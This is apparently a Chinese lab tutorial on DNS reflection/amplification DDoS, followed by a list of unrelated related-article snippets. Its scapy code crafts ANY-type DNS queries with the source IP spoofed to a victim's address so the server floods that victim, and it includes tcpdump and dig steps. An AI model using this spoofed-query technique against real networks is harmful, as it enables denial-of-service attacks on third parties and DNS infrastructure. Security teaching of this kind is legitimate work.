利用dns协议发起ddos反射攻击
利用DNS服务器发起反射型DDOS,攻击带宽
基本思路:
1、利用any类型的dns查询,可完成发送少量请求数据,获得大量返回数据。
2、将原请求地址改为受害者地址,则dns会向受害者返回大量数据,占用带宽
警告!
利用公共dns的攻击行为会影响dns的性能,请谨慎使用,一旦大规模占用dns资源会造成dns拥堵,属于违法犯罪行为。
实验步骤:
1、验证服务器是否可正常工作
查看网关。(Nat模式下,所有虚拟机都是在主机下的子网里,默认dns服务器地址即为网关地址)
命令:route -n
(2)登录攻击机,使用dig查询dns
命令为:dig host地址 @dns服务器地址
确认DNS服务器可用
2、抓取any查询的数据包
使用攻击机抓取数据包
使用攻击机开始dig查询
停止抓包
Pkill tcpdump
3、使用scapy分析数据包
打开scapy,读取数据包
Pcap=rdpcap(“dns.pcap”) #读文件
Pcap[3] #获取第4条数据,前三条为三次握手,第四条才是dns请求。
查看数据包结构
ls(DNS)
ls(DNSQR)
构造数据包:
i=IP(src="192.168.237.128",dst="192.168.237.2")u=UDP()q=DNSQR(qname="baidu.com",qtype=255)d=DNS(rd=1,qdcount=1,qd=q)r=(i/u/d)
sr1(r)
确认可以成功发包。
4、使用靶机抓包
靶机打开wireshark,开启抓包。
5、使用攻击机伪造IP源,发起攻击
i=IP(src="192.168.237.132",dst="192.168.237.2")
r=(i/u/d)
sr1(r)
6、观察靶机,可以看到确实接收到了DNS服务器发来的数据包。
相关文章:
利用dns协议发起ddos反射攻击
利用DNS服务器发起反射型DDOS,攻击带宽 基本思路: 1、利用any类型的dns查询,可完成发送少量请求数据,获得大量返回数据。 2、将原请求地址改为受害者地址,则dns会向受害者返回大量数据,占用带宽 警告&…...
Tcl基础知识
一、概述 Tcl 语言的全称 Tool Command Language,即工具命令语言。这种需要在 EDA 工具中使用的相当之多,或者说几乎每个 EDA 工具都支持 Tcl 语言,并将它作为自己的命令shell。 静态时序分析中多用的 Synopsys Tcl 语言,…...
Go中的编程模式:Pipeline
本文章我们重点来介绍一下 Go 编程中的 Pipeline 模式。用过 Linux 命令行的人都不会陌生,它是一种把各种命令拼接起来完成一个更强功能的技术方法,在C语言中也有pipe管道的叫法,具体的有兴趣的同学也可以去了解。 现在的流式处理、函数式编程、应用网关对微服务进行简单的…...
2023最新pytorch安装教程,简单易懂,面向初学者(Anaconda+GPU)
一、前言 目前是2023.1.27,鉴于本人安装过程中踩得坑,安装之前我先给即将安装pytorch的各位提个醒,有以下几点需要注意 1.判断自己电脑是否有GPU 注意这点很重要,本教程面向有NVIDA显卡的电脑,如果你的电脑没有GPU或者使用AMD显…...
Redis为什么变慢了
一、Redis为什么变慢了 1.Redis真的变慢了吗? 对 Redis 进行基准性能测试 例如,我的机器配置比较低,当延迟为 2ms 时,我就认为 Redis 变慢了,但是如果你的硬件配置比较高,那么在你的运行环境下,可能延迟是 0.5ms 时就可以认为 Redis 变慢了。 所以,你只有了解了你的…...
空中计算(Over-the-Air Computation)学习笔记
文章目录 写在前面 写在前面 本文是论文A Survey on Over-the-Air Computation的阅读笔记: 通信和计算通常被视为独立的任务。 从工程的角度来看,这种方法是非常有效的,因为可以执行孤立的优化。 然而,对于许多面向计算的应用程序…...
如何高效率地阅读论文
▚ 01 Active versus passive reading: how to read scientific papers? 📢小疑则小悟,大疑则大悟,不疑则不悟。 If you read/do research with small questions in mind, you learn small things. If you do so with big questions in…...
FreeRTOS学习day1
顾名思义 免费的实时操作系统 用法基本和Linux下的多线程编程类似 探索者开发版实验 动态创建4个任务start_task task1 task2 task3 优先级依次为1 2 3 4 (注意优先级不能为0,0是空闲任务) 我的理解:主线程start_task 主线程 task1 ta…...
【Web】| CSS Float (浮动)的使用方法
Float(浮动)概念 CSS的Float(浮动),会使得元素向左或者向右移动,其它周围元素也会重新排列。 Float浮动,往往是用于图像,但它的布局一样非常有效。 元素如何浮动 元素的水平方向…...
#力扣:面试题 02.03. 删除中间节点@FDDLC
面试题 02.03. 删除中间节点 - 力扣(LeetCode) 一、Java /*** Definition for singly-linked list.* public class ListNode {* int val;* ListNode next;* ListNode(int x) { val x; }* }*/ class Solution {public void deleteNode(List…...
多线程原子性、一致性与有序性
作者:逍遥Sean 简介:一个主修Java的Web网站\游戏服务器后端开发者 主页:https://blog.csdn.net/Ureliable 觉得博主文章不错的话,可以三连支持一下~ 如有需要我的支持,请私信或评论留言! 前言: …...
)
读书笔记:Effective C++ 2.0 版,条款28(namespace )
条款28: 划分全局名字空间 namespace 作为前缀,防止不同名字域的类型、常量等互相污染。 没命名的名字空间一般用于限制名字空间内部元素的可见性。 namespace sdm {const double book_version 2.0;class handle { ... };handle& gethandle(); }早期用struct模…...
CSS常见选择器总结
1.简单选择器 简单选择器是开发中使用最多的选择器,包含: 元素选择器,使用元素的名称 类选择器,使用.类名 id选择器,使用#id id注意事项: 一个HTML文档里面的id值 是唯一的,不能重复 id值如…...
阿里云服务结构--长期更新
CNCF 全称Cloud Native Computing Foundation(云原生计算基金会),成立于 2015 年7月21日(于美国波特兰OSCON 2015上宣布),其最初的口号是坚持和整合开源技术来让编排容器作为微服务架构的一部分࿰…...
Java8 BiConsumer<T, U> 函数接口浅析分享(含示例,来戳!)
文章目录 Java8 BiConsumer<T, U> 函数接口浅析分享(含示例,来戳!)源码accept 方法示例示例一示例二 andThen 方法示例示例一示例二 示例相关代码类dohandler 方法student.javaStudentScore.javaStudentScoreDto.java Java8…...
C++学习:类的使用--运算符重载
我们知道C可以对函数进行重载,让同名的函数来完成相同的基本操作。其实运算符也是可以重载的,而且有的运算符已经在使用了,就像*,既可以用于地址,又可以用于乘法。 下面是一个计算时间的类 #ifndef MYTIME_H #define…...
嵌入式养成计划-46----QT--简易版网络聊天室实现--QT如何连接数据库
一百一十九、简易版网络聊天室实现 119.1 QT实现连接TCP协议 119.1.1 基于TCP的通信流程 119.1.2 QT中实现服务器过程 使用QTcpServer实例化一个服务器对象设置监听状态,通过listen()函数,可以监听特定的主机,也可以监听所有客户端&#x…...
YOLO目标检测——人脸识别数据集【对应voc、coco和yolo三种格式标签】
实际项目应用:安全监控、智能驾驶、人机交互、人脸门禁、人脸支付、人脸搜索数据集说明:人脸识别数据集,真实场景的高质量图片数据,数据场景丰富,含有人脸图片标签说明:使用lableimg标注软件标注࿰…...
mybatis日志不打印的问题
在项目中使用了 spring boot,orm 层集成了 mybatis-plus,按照默认配置后发现之前配置的 sql 日志正常,在这里却不正常,鉴于日志使用的是 logback,想到了打印 sql 的日志级别是 debug,所以,按照这…...
【分布式缓存】关于 Memcached 的几个常见问题
关于 Memcached 的几个常见问题 1.Memcached 是怎么工作的?2.Memcached 最大的优势是什么?3.Memcached 和 MySQL 的 querycache 相比,有什么优缺点?4.Memcached 和服务器的 local cache(比如 PHP 的 APC、mmap 文件等&…...
从Vivado工程到上电自启:ZYNQ7020双核ARM+FPGA的完整启动流程详解
ZYNQ7020双核ARMFPGA启动全流程深度解析:从比特流到系统自举 当你按下ZYNQ开发板的电源键时,一个精密的启动交响乐便开始演奏——FPGA配置数据从Flash中苏醒,ARM核执行第一条指令,各外设模块按序初始化。这个看似自动化的过程背后…...
Cadence 17.2 allegro怎么把线从中间剪掉一段
可以点Delete命令右键选cut剪切,在点线的要剪切的开始点和结束点。1、减掉一段丝印线右键-->cut选中要裁剪的线的开始点和结束点,右键done2、减掉一段导线右键-->cut选中要裁剪的线的开始点和结束点,右键done。...
IM系统核心不是聊天?深入剖析SpringBoot+Netty项目中关系链与群组模块的设计陷阱
IM系统核心不是聊天?深入剖析SpringBootNetty项目中关系链与群组模块的设计陷阱 当大多数人谈论即时通讯系统时,首先想到的是消息收发功能。然而,真正让微信、QQ等产品形成护城河的,并非简单的消息传输能力,而是其背后…...
基于Phi-4-mini-reasoning的智能数据匹配方案:告别VLOOKUP跨表烦恼
基于Phi-4-mini-reasoning的智能数据匹配方案:告别VLOOKUP跨表烦恼 1. 场景痛点:VLOOKUP的跨表匹配困境 财务小王最近遇到了一个头疼的问题:每个月末都要处理几十张报表的数据匹配工作。这些数据分散在不同工作簿中,需要根据产品…...
——主流库STL转点云性能与效果深度评测)
3D图像处理(二)——主流库STL转点云性能与效果深度评测
1. STL转点云的核心需求与技术背景 在工业检测、逆向工程和三维重建领域,STL文件向点云数据的转换是基础且关键的预处理步骤。STL作为三维建模的通用格式,采用三角面片描述物体表面,而点云则是离散空间点的集合,更适合特征提取、配…...
AI 时代,计算机专业学生该怎么学?难
整体排查思路 我们的目标是验证以下三个环节是否正常: 登录成功时:服务器是否正确生成了Session并返回了包含正确 JSESSIONID的Cookie给浏览器。 浏览器端:浏览器是否成功接收并存储了该Cookie。 后续请求:浏览器在执行查询等操作…...
AI时代新型的项目管理应该是什么样的?侣
AI训练存储选型的演进路线 第一阶段:单机直连时代 早期的深度学习数据集较小,模型训练通常在单台服务器或单张GPU卡上完成。此时直接将数据存储在训练机器的本地NVMe SSD/HDD上。 其优势在于IO延迟最低,吞吐量极高,也就是“数据离…...
--网络基础1)
Linux学习笔记(二十)--网络基础1
计算机网络背景独立模式 状态描述: 这是最原始的阶段。计算机是大型、昂贵且独立的设备(如大型机),没有相互连接。每台计算机都拥有自己的专用外设(打印机、磁带机),运行自己的程序和存储自己的…...
DeepSeek V4 全面实测:万亿参数开源模型的工程落地与成本推演
上周 DeepSeek V4 的消息一出,我当天夜里几乎没合眼——作为从 V2 时期一路跟过来的独立开发者,每次大版本迭代对我来说都像一场技术狂欢。V3 的性能已经足够激进,V4 直接把参数量拉到了万亿级别,而且还保持开源,这件事…...
FreeMove:Windows目录迁移终极解决方案,98%成功率释放C盘空间
FreeMove:Windows目录迁移终极解决方案,98%成功率释放C盘空间 【免费下载链接】FreeMove Move directories without breaking shortcuts or installations 项目地址: https://gitcode.com/gh_mirrors/fr/FreeMove 你是否经常因为C盘空间不足而烦恼…...